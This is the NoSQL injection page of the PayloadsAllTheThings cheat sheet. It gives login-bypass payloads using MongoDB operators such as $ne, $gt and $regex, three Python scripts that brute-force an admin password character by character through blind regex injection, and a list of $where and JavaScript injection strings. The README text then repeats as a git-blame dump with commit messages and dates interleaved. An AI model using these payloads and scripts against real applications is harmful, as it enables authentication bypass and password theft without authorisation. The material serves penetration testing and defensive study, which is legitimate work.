PayloadsAllTheThings/NoSQL Injection/README.md

# NoSQL injection

> NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.

## Summary

* [Tools](#tools)
* [Exploit](#exploits)
  * [Authentication Bypass](#authentication-bypass)
  * [Extract length information](#extract-length-information)
  * [Extract data information](#extract-data-information)
* [Blind NoSQL](#blind-nosql)
  * [POST with JSON body](#post-with-json-body)
  * [GET](#get)
* [MongoDB Payloads](#mongodb-payloads)
* [References](#references)

## Tools

* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)
* [nosqlilab - A lab for playing with NoSQL Injection](https://github.com/digininja/nosqlilab)

## Exploit

### Authentication Bypass

Basic authentication bypass using not equal ($ne) or greater ($gt)

```json
in DATA
username[$ne]=toto&password[$ne]=toto
login[$regex]=a.*&pass[$ne]=lol
login[$gt]=admin&login[$lt]=test&pass[$ne]=1
login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto

in JSON
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{"username": {"$gt":""}, "password": {"$gt":""}}
```

### Extract length information

```json
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
```

### Extract data information

```json
in URL
username[$ne]=toto&password[$regex]=m.{2}
username[$ne]=toto&password[$regex]=md.{1}
username[$ne]=toto&password[$regex]=mdp

username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=md.*

in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
```

Extract data with "in"

```json
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
```


## Blind NoSQL

### POST with JSON body


```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()

username="admin"
password=""
u="http://example.org/login"
headers={'content-type': 'application/json'}

while True:
    for c in string.printable:
        if c not in ['*','+','.','?','|']:
            payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
            r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
            if 'OK' in r.text or r.status_code == 302:
                print("Found one more char : %s" % (password+c))
                password += c
```

### POST with urlencoded body

```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()

username="admin"
password=""
u="http://example.org/login"
headers={'content-type': 'application/x-www-form-urlencoded'}

while True:
    for c in string.printable:
        if c not in ['*','+','.','?','|','&','$']:
            payload='user=%s&pass[$regex]=^%s&remember=on' % (username, password + c)
            r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
            if r.status_code == 302 and r.headers['Location'] == '/dashboard':
                print("Found one more char : %s" % (password+c))
                password += c
```

### GET

```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()

username='admin'
password=''
u='http://example.org/login'

while True:
  for c in string.printable:
    if c not in ['*','+','.','?','|', '#', '&', '$']:
      payload='?username=%s&password[$regex]=^%s' % (username, password + c)
      r = requests.get(u + payload)
      if 'Yeah' in r.text:
        print("Found one more char : %s" % (password+c))
        password += c
```

## MongoDB Payloads

```bash
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
```

## References

* [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat](https://www.dailysecurity.fr/nosql-injections-classique-blind/)
* [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection)
* [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists)
* [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb)
NOSQL injection added + updates XSS/XXE 2016-10-30 12:53:32 +01:00			`# NoSQL injection`
Markdown formatting update 2018-08-12 23:30:22 +02:00
MS14-068 + /etc/security/opasswd 2019-06-29 17:55:13 +02:00			`> NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.`

			`## Summary`

			`* [Tools](#tools)`
little changes - fix exploits ToC anchor - add nosqlilab 2019-10-09 16:53:34 +02:00			`* [Exploit](#exploits)`
MS14-068 + /etc/security/opasswd 2019-06-29 17:55:13 +02:00			`* [Authentication Bypass](#authentication-bypass)`
			`* [Extract length information](#extract-length-information)`
			`* [Extract data information](#extract-data-information)`
			`* [Blind NoSQL](#blind-nosql)`
			`* [POST with JSON body](#post-with-json-body)`
			`* [GET](#get)`
			`* [MongoDB Payloads](#mongodb-payloads)`
			`* [References](#references)`

			`## Tools`

			`* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)`
little changes - fix exploits ToC anchor - add nosqlilab 2019-10-09 16:53:34 +02:00			`* [nosqlilab - A lab for playing with NoSQL Injection](https://github.com/digininja/nosqlilab)`
NOSQL injection added + updates XSS/XXE 2016-10-30 12:53:32 +01:00
			`## Exploit`

MS14-068 + /etc/security/opasswd 2019-06-29 17:55:13 +02:00			`### Authentication Bypass`

Traversal Dir + NoSQL major updates + small addons 2018-02-15 23:27:42 +01:00			`Basic authentication bypass using not equal ($ne) or greater ($gt)`
Markdown formatting update 2018-08-12 23:30:22 +02:00
			```json
Bind shell cheatsheet (Fix #194) 2020-05-24 14:09:46 +02:00			`in DATA`
NOSQL injection added + updates XSS/XXE 2016-10-30 12:53:32 +01:00			`username[$ne]=toto&password[$ne]=toto`
Bind shell cheatsheet (Fix #194) 2020-05-24 14:09:46 +02:00			`login[$regex]=a.*&pass[$ne]=lol`
			`login[$gt]=admin&login[$lt]=test&pass[$ne]=1`
			`login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto`
Traversal Dir + NoSQL major updates + small addons 2018-02-15 23:27:42 +01:00
			`in JSON`
Web socket + title capitalization 2019-03-07 00:03:25 +01:00			`{"username": {"$ne": null}, "password": {"$ne": null}}`
			`{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}`
			`{"username": {"$gt": undefined}, "password": {"$gt": undefined}}`
			`{"username": {"$gt":""}, "password": {"$gt":""}}`
NOSQL injection added + updates XSS/XXE 2016-10-30 12:53:32 +01:00			```

MS14-068 + /etc/security/opasswd 2019-06-29 17:55:13 +02:00			`### Extract length information`
Markdown formatting update 2018-08-12 23:30:22 +02:00
			```json
NOSQL injection added + updates XSS/XXE 2016-10-30 12:53:32 +01:00			`username[$ne]=toto&password[$regex]=.{1}`
			`username[$ne]=toto&password[$regex]=.{3}`
			```

MS14-068 + /etc/security/opasswd 2019-06-29 17:55:13 +02:00			`### Extract data information`
Markdown formatting update 2018-08-12 23:30:22 +02:00
			```json
Traversal Dir + NoSQL major updates + small addons 2018-02-15 23:27:42 +01:00			`in URL`
NOSQL injection added + updates XSS/XXE 2016-10-30 12:53:32 +01:00			`username[$ne]=toto&password[$regex]=m.{2}`
			`username[$ne]=toto&password[$regex]=md.{1}`
			`username[$ne]=toto&password[$regex]=mdp`

			`username[$ne]=toto&password[$regex]=m.*`
			`username[$ne]=toto&password[$regex]=md.*`
Traversal Dir + NoSQL major updates + small addons 2018-02-15 23:27:42 +01:00
			`in JSON`
			`{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}`
			`{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}`
			`{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}`
			```

Web socket + title capitalization 2019-03-07 00:03:25 +01:00			`Extract data with "in"`

MarkDown typo 2019-03-19 00:06:22 +01:00			```json
Web socket + title capitalization 2019-03-07 00:03:25 +01:00			`{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}`
			```


Traversal Dir + NoSQL major updates + small addons 2018-02-15 23:27:42 +01:00			`## Blind NoSQL`
Markdown formatting update 2018-08-12 23:30:22 +02:00
add nosqli GET example 2019-04-21 13:00:16 +02:00			`### POST with JSON body`


Traversal Dir + NoSQL major updates + small addons 2018-02-15 23:27:42 +01:00			```python
			`import requests`
			`import urllib3`
			`import string`
			`import urllib`
			`urllib3.disable_warnings()`

			`username="admin"`
			`password=""`
add nosqli GET example 2019-04-21 13:00:16 +02:00			`u="http://example.org/login"`
add JSON headers 2019-04-24 22:59:24 +02:00			`headers={'content-type': 'application/json'}`
Traversal Dir + NoSQL major updates + small addons 2018-02-15 23:27:42 +01:00
			`while True:`
			`for c in string.printable:`
			`if c not in ['*','+','.','?','\|']:`
			`payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)`
Added an alternate possible Found condition to POST 2019-10-29 20:11:56 +01:00			`r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)`
			`if 'OK' in r.text or r.status_code == 302:`
Traversal Dir + NoSQL major updates + small addons 2018-02-15 23:27:42 +01:00			`print("Found one more char : %s" % (password+c))`
			`password += c`
NOSQL injection added + updates XSS/XXE 2016-10-30 12:53:32 +01:00			```

NoSQLi: add POST with urlencoded body 2021-11-07 17:49:50 +01:00			`### POST with urlencoded body`

			```python
			`import requests`
			`import urllib3`
			`import string`
			`import urllib`
			`urllib3.disable_warnings()`

			`username="admin"`
			`password=""`
			`u="http://example.org/login"`
			`headers={'content-type': 'application/x-www-form-urlencoded'}`

			`while True:`
			`for c in string.printable:`
			`if c not in ['*','+','.','?','\|','&','$']:`
			`payload='user=%s&pass[$regex]=^%s&remember=on' % (username, password + c)`
			`r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)`
			`if r.status_code == 302 and r.headers['Location'] == '/dashboard':`
			`print("Found one more char : %s" % (password+c))`
			`password += c`
			```

add nosqli GET example 2019-04-21 13:00:16 +02:00			`### GET`

			```python
			`import requests`
			`import urllib3`
			`import string`
			`import urllib`
			`urllib3.disable_warnings()`

			`username='admin'`
			`password=''`
			`u='http://example.org/login'`

			`while True:`
			`for c in string.printable:`
			`if c not in ['*','+','.','?','\|', '#', '&', '$']:`
			`payload='?username=%s&password[$regex]=^%s' % (username, password + c)`
			`r = requests.get(u + payload)`
			`if 'Yeah' in r.text:`
			`print("Found one more char : %s" % (password+c))`
			`password += c`
			```

Methodology updated with RPCClient, User enumeration 2017-05-17 20:40:45 +02:00			`## MongoDB Payloads`
Markdown formatting update 2018-08-12 23:30:22 +02:00
			```bash
Methodology updated with RPCClient, User enumeration 2017-05-17 20:40:45 +02:00			`true, $where: '1 == 1'`
			`, $where: '1 == 1'`
			`$where: '1 == 1'`
			`', $where: '1 == 1'`
			`1, $where: '1 == 1'`
			`{ $ne: 1 }`
			`', $or: [ {}, { 'a':'a`
			`' } ], $comment:'successful MongoDB injection'`
			`db.injection.insert({success:1});`
			`db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1`
			`\|\| 1==1`
			`' && this.password.match(/.*/)//+%00`
			`' && this.passwordzz.match(/.*/)//+%00`
			`'%20%26%26%20this.password.match(/.*/)//+%00`
			`'%20%26%26%20this.passwordzz.match(/.*/)//+%00`
			`{$gt: ''}`
			`[$ne]=1`
			```

Adding references sectio 2018-12-24 15:02:50 +01:00			`## References`
Markdown formatting update 2018-08-12 23:30:22 +02:00
			`* [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat](https://www.dailysecurity.fr/nosql-injections-classique-blind/)`
			`* [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection)`
MS14-068 + /etc/security/opasswd 2019-06-29 17:55:13 +02:00			`* [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists)`
			`* [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb)`